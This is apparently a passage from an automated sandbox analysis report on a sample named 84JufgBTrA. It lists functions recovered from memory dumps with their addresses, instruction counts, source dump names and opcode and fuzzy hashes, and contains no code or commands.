                                            • Instruction ID: 168c71bfb93800f639140919fc3c729778035e44b212b32037d8f5263ef1b5ef
                                            • Opcode Fuzzy Hash: 42e4b5955bfd2c49314a8f245b6f9dbdceddf38033c7e8f73c4f4834d601d3ef
                                            • Instruction Fuzzy Hash: C4812631B4EA4A4FE7389F6894690B5B7E0EF45310B1656BED58FC31A3DE3AA6018341
                                            Function 00007FFD9BF8D5A7 Relevance: .3, Instructions: 252COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5beb1ddbcc34ccd12a3043ef9c9f9a38c4e6d6665b3ad176475a7a1c0d06b6f6
                                            • Instruction ID: 18d810c0da99747ac67f0aec26b503c03c3f21af17b66b18834fea8fecc6a3be
                                            • Opcode Fuzzy Hash: 5beb1ddbcc34ccd12a3043ef9c9f9a38c4e6d6665b3ad176475a7a1c0d06b6f6
                                            • Instruction Fuzzy Hash: 7321C11AF8E85F8BF7396ED838350FC56409F14320F1607BEC01F829E2DE2E2A415291
                                            Function 00007FFD9BF87889 Relevance: .2, Instructions: 247COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 818c37bd47071f953e8c747d84931edfc80e479e26749f3418f035bf22552467
                                            • Instruction ID: 8af2422a354e5c614beed8b5d8414fa9170f6147e5479d6520e28a79fa79d066
                                            • Opcode Fuzzy Hash: 818c37bd47071f953e8c747d84931edfc80e479e26749f3418f035bf22552467
                                            • Instruction Fuzzy Hash: 76713731A4EC8E4FE779DE5888666B477D0EF45310B1203B9D05FC75B2DE2AAA0683C1
                                            Function 00007FFD9BF8BBB1 Relevance: .2, Instructions: 222COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bca3aa3ec7dd3bbcc14ec5174b8c664e0c3d566b9ca9ac10bb75e6bbf537895a
                                            • Instruction ID: 01f81604f853bff9619eca69751eb99942411cf326d374745f887472f7a542ee
                                            • Opcode Fuzzy Hash: bca3aa3ec7dd3bbcc14ec5174b8c664e0c3d566b9ca9ac10bb75e6bbf537895a
                                            • Instruction Fuzzy Hash: 1781AF3064AF4A8FD369DF54C1A157177A1FF44300B255A7EC48B87AA3DA3BB942CB40
                                            Function 00007FFD9BF8CE55 Relevance: .2, Instructions: 216COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2baeb7e1d99f256d70cad81c9febb6f2a51b3ac8648cb6f1e6e8a847f35e6734
                                            • Instruction ID: f678552ba4a15951fd94a39238af4e8155507d6874a839c60f1ce6af0a435914
                                            • Opcode Fuzzy Hash: 2baeb7e1d99f256d70cad81c9febb6f2a51b3ac8648cb6f1e6e8a847f35e6734
                                            • Instruction Fuzzy Hash: C261D532F4EA9E8FDB65EFA898744E97BA0EF05354B0501B7D05AC70E3D93929068350
                                            Function 00007FFD9BF8AF00 Relevance: .2, Instructions: 216COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 02a8b3a96f914fdc15ce638f86f6e76d566657cc4fe2fb8edd8a4f4fc321b4dc
                                            • Instruction ID: 23b255dfea3b278a78a234df2a88001e9f99e6684e7c5a8cba695c8eb44ccc73
                                            • Opcode Fuzzy Hash: 02a8b3a96f914fdc15ce638f86f6e76d566657cc4fe2fb8edd8a4f4fc321b4dc
                                            • Instruction Fuzzy Hash: 7781B570E09A4D8FDBA9DF688865BE97BB0FF15300F0041BED05EC72A6DE356A418B41
                                            Function 00007FFD9BF8A57E Relevance: .2, Instructions: 208COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 846ae2a5ae31958714e7168ac0d09f2f423c06ad45d4250115f22a75c74e25a3
                                            • Instruction ID: 1dd43a2d171953b8b7e0e1369b63d3a31be3b46f38dc74eed21119d41a442726
                                            • Opcode Fuzzy Hash: 846ae2a5ae31958714e7168ac0d09f2f423c06ad45d4250115f22a75c74e25a3
                                            • Instruction Fuzzy Hash: B371153060EE8E8FD75ADF68D0A05A4BBA0FF05310F5542BAC04AC7697DB39B951CB80
                                            Function 00007FFD9BF86B9B Relevance: .2, Instructions: 198COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a2c8fc36d217e282ceaa24b8839aafa4aff7fb5e29abee035fa3ced2cf8eddc8
                                            • Instruction ID: 8f0257b1a17de61fdb14e009e76eb0023c8b3eee019ae457a240e800beeb480b
                                            • Opcode Fuzzy Hash: a2c8fc36d217e282ceaa24b8839aafa4aff7fb5e29abee035fa3ced2cf8eddc8
                                            • Instruction Fuzzy Hash: 4551E131E5ED4E9EEBA5DFA488656BC7BB1EF45300F1106BAD00FC31A1DE3A69019701
                                            Function 00007FFD9B870868 Relevance: .2, Instructions: 169COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9e26fbf3a5b263092f5c7dc696d24b501c043dcef7133f35ee42a46a2de95038
                                            • Instruction ID: 655c4180834f5002038b17e99713fbfa68ba5a3663d400449abf7d275fbb25e0
                                            • Opcode Fuzzy Hash: 9e26fbf3a5b263092f5c7dc696d24b501c043dcef7133f35ee42a46a2de95038
                                            • Instruction Fuzzy Hash: 4F413B31F1DA588FDB65EB7C88946A977E1FF5C305B0501BAE09EC72A2DE3498018741
                                            Function 00007FFD9B871295 Relevance: .2, Instructions: 152COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0209c2c6f7711bca84f6f8f7fb44387e8a60d5024650086318f9e13ad91f1e52
                                            • Instruction ID: fafdaf2b76e90f845f421df77b793176bf84132cbadf93cfb42897d2cd52fbdb
                                            • Opcode Fuzzy Hash: 0209c2c6f7711bca84f6f8f7fb44387e8a60d5024650086318f9e13ad91f1e52
                                            • Instruction Fuzzy Hash: 7A417F71E08A5D8FDB48EFA8E895AEDB7E1FF58314F10017AD019D7296DA346841C780
                                            Function 00007FFD9B8712B0 Relevance: .1, Instructions: 138COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f0e0a5933e435c0b2e4287619f872f3f1973860b7cfcefb7903a9797aaf61c56
                                            • Instruction ID: b6b2f09729da75fc32e44af70dc2cf136d06098fe4082abeec0f24a379754fb1
                                            • Opcode Fuzzy Hash: f0e0a5933e435c0b2e4287619f872f3f1973860b7cfcefb7903a9797aaf61c56
                                            • Instruction Fuzzy Hash: 8B417E30E18A1D8FDB58EFA8E895AED77E1FF58314F10017AE01DD3296DE34A8818780
                                            Function 00007FFD9BF8750C Relevance: .1, Instructions: 128COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eb3f4d1e3784667d51eea37a0047de414795a5c1f30a836d404a609d7e27ffd3
                                            • Instruction ID: f51e629934e36deb1026afc04ac8e44276ad758e735205f75fd219a84f3afcd6
                                            • Opcode Fuzzy Hash: eb3f4d1e3784667d51eea37a0047de414795a5c1f30a836d404a609d7e27ffd3
                                            • Instruction Fuzzy Hash: B141393098F7C94FE753D764D8156F53FA0EF43324F0502FAE09A8A0A3D6665616C752
                                            Function 00007FFD9BF800D7 Relevance: .1, Instructions: 127COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3c8c422e62395c8d062e5a6425991637c6fc592a6ed8535a33bb53cda2c5c7c6
                                            • Instruction ID: 3909d92e96a740a7451700d023e0af7bcfe3f186fc59e3bcc1577cf0816fd207
                                            • Opcode Fuzzy Hash: 3c8c422e62395c8d062e5a6425991637c6fc592a6ed8535a33bb53cda2c5c7c6
                                            • Instruction Fuzzy Hash: E0414F3260C9498FDF98EF68D4A5DA4B3E1FB6832470402ADD04EC75A2DE35E945CB81
                                            Function 00007FFD9BF8C167 Relevance: .1, Instructions: 127COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5fb800dc5bb14d02d51f3decc9633f1a2d38420233cc0f6b5eb5696ec5909f32
                                            • Instruction ID: bed46d479196dfab8f1e6a84f172b96f3070a19475c0007976194821ca4633b2
                                            • Opcode Fuzzy Hash: 5fb800dc5bb14d02d51f3decc9633f1a2d38420233cc0f6b5eb5696ec5909f32
                                            • Instruction Fuzzy Hash: 5A41613260C9498FDF98EF5CD4A6DA4B7E1FF6831070442AED04AC75A2DE35E945CB81
                                            Function 00007FFD9BF80181 Relevance: .1, Instructions: 120COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f3aa6bbdb80f4a0bb7542d4c1076c86be121aa93e044477cebc99ad848c2b068
                                            • Instruction ID: 55faa959f09acb32063e09c58113c050080fb05d8e9df5bad3894a3b9c3aa070
                                            • Opcode Fuzzy Hash: f3aa6bbdb80f4a0bb7542d4c1076c86be121aa93e044477cebc99ad848c2b068
                                            • Instruction Fuzzy Hash: BF315E3260C9498FDF9DEF28C4A5DA4B3E1FF6931470402ADD44EC75A2DE25E945CB81
                                            Function 00007FFD9BF8C211 Relevance: .1, Instructions: 120COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cef714c93d50e35c4432258e85d8364ecd724decc0a666804339126aa1bb9905
                                            • Instruction ID: 6e75e41d76a26763dc47af4ca9011a104d2be58ce984561a669f702eb1fa938d
                                            • Opcode Fuzzy Hash: cef714c93d50e35c4432258e85d8364ecd724decc0a666804339126aa1bb9905
                                            • Instruction Fuzzy Hash: 41318F3260C9498FDF98EF1CC4A5DA4B7E1FF6831070442AED44AC75A2DE39E945CB81
                                            Function 00007FFD9BF8011B Relevance: .1, Instructions: 115COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0899c6bfe0fbd590813d78e3749edad680bbfce47597cf81fa84630d820566e9
                                            • Instruction ID: 7eabbc7ab54bdf3d78d0f4c9dcf6966f82a8109ed4efd3ab8dbab07dad273412
                                            • Opcode Fuzzy Hash: 0899c6bfe0fbd590813d78e3749edad680bbfce47597cf81fa84630d820566e9
                                            • Instruction Fuzzy Hash: 5931303260C9498FDF98EF28C4A5DA4B3E1FF6831471402ADD04EC75A2DE39E945CB81
                                            Function 00007FFD9BF8C1AB Relevance: .1, Instructions: 115COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 37eed5b624627ee31e984fdf57d1f0ae3a5b7ff2ddbc3223fec0852b2d1ab765
                                            • Instruction ID: 2a360e1a43cc1bde18a4f91f9c9c68db591277a557aaad3fe26636d9d2a7e8cd
                                            • Opcode Fuzzy Hash: 37eed5b624627ee31e984fdf57d1f0ae3a5b7ff2ddbc3223fec0852b2d1ab765
                                            • Instruction Fuzzy Hash: 3C316F3260C9498FDF98EF58C4A5DA4B7E1FF6831070442AED04AC75A2DE39E945CB81
                                            Function 00007FFD9B8712E8 Relevance: .1, Instructions: 113COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 84347a935215eaf8e0df74088e35f93ea7950723cbfc94a7b44ac48737d74ef1
                                            • Instruction ID: 4a092d65112c74fdffabe9b1714801050153004195e9d3fc28459c6501759544
                                            • Opcode Fuzzy Hash: 84347a935215eaf8e0df74088e35f93ea7950723cbfc94a7b44ac48737d74ef1
                                            • Instruction Fuzzy Hash: C8412930E14A5D8FDB94EF98D895AEDB7F1FF98305F10017AE419E32A5DA34A881CB40
                                            Function 00007FFD9B875025 Relevance: .1, Instructions: 112COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7fe4638c9222f95f2e2b65a397c0f1bbcd1b1a44261d8184bf288f57a135b2e9
                                            • Instruction ID: e0297d3851f7fbd2b8f45b9f84fc299aa02e02aa0d345eea3e8cf1f4dfc3fbb0
                                            • Opcode Fuzzy Hash: 7fe4638c9222f95f2e2b65a397c0f1bbcd1b1a44261d8184bf288f57a135b2e9
                                            • Instruction Fuzzy Hash: 8E41ED75E1851D8FDBA4EF14C8A5BEDB7B1EB58309F1001EAD00EE32A5DB746A818F41
                                            Function 00007FFD9BF8CEFC Relevance: .1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 29f54a14cf5ee83df9464d229e61de363cf1962e48933ab80394605b08173799
                                            • Instruction ID: ef52c2852260ebfbc78b5a2c507cef63307a1274afc9d3bf9bdaa23322db7772
                                            • Opcode Fuzzy Hash: 29f54a14cf5ee83df9464d229e61de363cf1962e48933ab80394605b08173799
                                            • Instruction Fuzzy Hash: B531C331E4E95E9FDB55EFA8D8648ED7BB0FF05304F0401BBD00AD71A2DA3969058750
                                            Function 00007FFD9BF882FA Relevance: .1, Instructions: 107COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 57c89278ea93715dad806e71563c2f16722655bf236e46e88a919e7ccd54dfd5
                                            • Instruction ID: 54542c4d7fc8576341436df4bae2fa83b03f5899c7a1cf65b9d2969352bd8d75
                                            • Opcode Fuzzy Hash: 57c89278ea93715dad806e71563c2f16722655bf236e46e88a919e7ccd54dfd5
                                            • Instruction Fuzzy Hash: 2631E071F19D4E8FEB64DF88D8A19ACB7A1FF54340F910279E01BD32A1DE3669129740
                                            Function 00007FFD9BF8754A Relevance: .1, Instructions: 104COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9cf5de7ff3761959c458e919036588dfbdccad92278537b4473d85a41ee4ef3
                                            • Instruction ID: dc9829e7c263ce65bfbaf74214fa6673fa4aa6cbfaebb884fa1640f3b67f0a66
                                            • Opcode Fuzzy Hash: f9cf5de7ff3761959c458e919036588dfbdccad92278537b4473d85a41ee4ef3
                                            • Instruction Fuzzy Hash: 7B31E72098F7C94FE753D77898686E93F616F43324F1A01FAE0968E4B3D6AA0615C712
                                            Function 00007FFD9BF882B5 Relevance: .1, Instructions: 104COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a311f960528f991cc8cbe0e3761862e22280dbf42d4597c25ed581e78655e10
                                            • Instruction ID: cacc7884141fd2e21552a3c446a8049e808575aa246ccf76926655f255f6fd3c
                                            • Opcode Fuzzy Hash: 2a311f960528f991cc8cbe0e3761862e22280dbf42d4597c25ed581e78655e10
                                            • Instruction Fuzzy Hash: C731E823F4EE8E4FE7659AAC58754E57B90EF51350B0502B6D09ECB4E3D92A68068341
                                            Function 00007FFD9BF8936B Relevance: .1, Instructions: 100COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d1e8c0766d4a93b790a77260d6ba4b5abcd58149bc2f5e4d55e111124d114ef3
                                            • Instruction ID: eb0685262770cf7af726b3b24833a714d5235384cc8bdda5835b55378e738e37
                                            • Opcode Fuzzy Hash: d1e8c0766d4a93b790a77260d6ba4b5abcd58149bc2f5e4d55e111124d114ef3
                                            • Instruction Fuzzy Hash: AD316271B49A1A8FDB58DF98D4A15A8B3B2FF84350B118239D14EC36A2DF35BC52C780
                                            Function 00007FFD9B870838 Relevance: .1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 904a15949bb1c9b999f556fd2c8d83cb237ac971dfa8e03628da2984962d09c0
                                            • Instruction ID: fafac50dda4b1f4f0ad5987657a6e9741685b0fb1b39c071a6cbfd95f4e779f8
                                            • Opcode Fuzzy Hash: 904a15949bb1c9b999f556fd2c8d83cb237ac971dfa8e03628da2984962d09c0
                                            • Instruction Fuzzy Hash: BB214232A1D3985ED721BB7CA8994EB3FD0EF4922DB14027FE4D9C3193D92490469381
                                            Function 00007FFD9B871575 Relevance: .1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7372580f10c19870594b7e58f2b9392620a29058bda49219cb4338aab6ab4f10
                                            • Instruction ID: 4c5358b40adf97d60885ff68bf8c402818565cf3e5c8e353d4161f0b6e0c6a39
                                            • Opcode Fuzzy Hash: 7372580f10c19870594b7e58f2b9392620a29058bda49219cb4338aab6ab4f10
                                            • Instruction Fuzzy Hash: F9313431E0D28E8FE712EBA8CC616EE77B4EF45314F054177D015C71D2EA38660A8B50
                                            Function 00007FFD9BF889E5 Relevance: .1, Instructions: 90COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e41975537c82fd149c660909061543e79a49ee372e5f30df19e266111af4f43
                                            • Instruction ID: a821c8a703c41439fcfe6489fac06773e584abccc0fbc8f3f7b2b7f02f6b5fb2
                                            • Opcode Fuzzy Hash: 5e41975537c82fd149c660909061543e79a49ee372e5f30df19e266111af4f43
                                            • Instruction Fuzzy Hash: AF21A230A5DA4D9FCB94DF94C8605EDBBB1FF59300F4106BAD00AE32E2DA35A901CB11
                                            Function 00007FFD9BF88448 Relevance: .1, Instructions: 90COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b1100ab5ebdf02074c7013f2a6cf047fbc031649d470fcf6fd3a793242a407e0
                                            • Instruction ID: c8b196e059e684dce854672301bc864b1fa45278d8025b972730843f213da34b
                                            • Opcode Fuzzy Hash: b1100ab5ebdf02074c7013f2a6cf047fbc031649d470fcf6fd3a793242a407e0
                                            • Instruction Fuzzy Hash: 72116D12B4EDCD0BD72AA7B848B15F43F91DF86200B0A42F6D48EC71D7DD2EA9058341
                                            Function 00007FFD9BF8BFE5 Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9d51803fdf27226e257f031fad806ffd9343c5b29b3590d7ded067dd2cfbcd8b
                                            • Instruction ID: dac9448b89b19ec2177faabab5fb0fe0cc672d2c84b68cf1f963a3dc4939f863
                                            • Opcode Fuzzy Hash: 9d51803fdf27226e257f031fad806ffd9343c5b29b3590d7ded067dd2cfbcd8b
                                            • Instruction Fuzzy Hash: 16310C30E5A90ECFDBA8DF988465ABD77B0FF44344F51027AD40FD22A1DE3A6A449741
                                            Function 00007FFD9BF8AED3 Relevance: .1, Instructions: 86COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 318702ac2f3ec8930a20ab95119e976152fa00a93b7e7c547816837c101b1625
                                            • Instruction ID: 2fd69c067599358cef07c018c070d24fa366cc82de5dd1b2ada5b7d7169c1f24
                                            • Opcode Fuzzy Hash: 318702ac2f3ec8930a20ab95119e976152fa00a93b7e7c547816837c101b1625
                                            • Instruction Fuzzy Hash: 97215C50A5E99F8EE73A8B544470574BB61EF5230171987FAE09BCB0EBC93DB942C381
                                            Function 00007FFD9BF88DC2 Relevance: .1, Instructions: 83COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1e3b304ac3d6d162c51bd25437926212abc63604e6315b673fd32b6e4ab0ae3e
                                            • Instruction ID: 61b3d304d1248673f35da526164d04d2c7c01d76f374d0dc6d7236558f70c12e
                                            • Opcode Fuzzy Hash: 1e3b304ac3d6d162c51bd25437926212abc63604e6315b673fd32b6e4ab0ae3e
                                            • Instruction Fuzzy Hash: A021FB31E0491D9FDF98DF58C4A5AE8B7B1FF68310F0141AED04EE36A1CA35A981CB40
